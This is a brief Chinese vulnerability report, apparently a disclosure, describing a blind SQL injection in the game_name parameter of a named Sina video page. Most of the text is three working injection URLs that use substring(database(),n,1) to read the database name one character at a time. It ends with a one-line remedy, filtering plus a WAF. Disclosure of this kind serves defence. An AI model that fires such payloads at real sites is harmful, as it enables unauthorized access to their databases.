新浪某站SQL注入

http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),1,1)='g' and 'x'=‘x

数据库第一位是g

http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),2,1)='t' and 'x'='x

第二位是t

http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),3,1)='v' and 'x'='x

第三位是v

可能是土豆调用了你们的api，可能是通用?

sql注入漏洞修复方案：

过滤+waf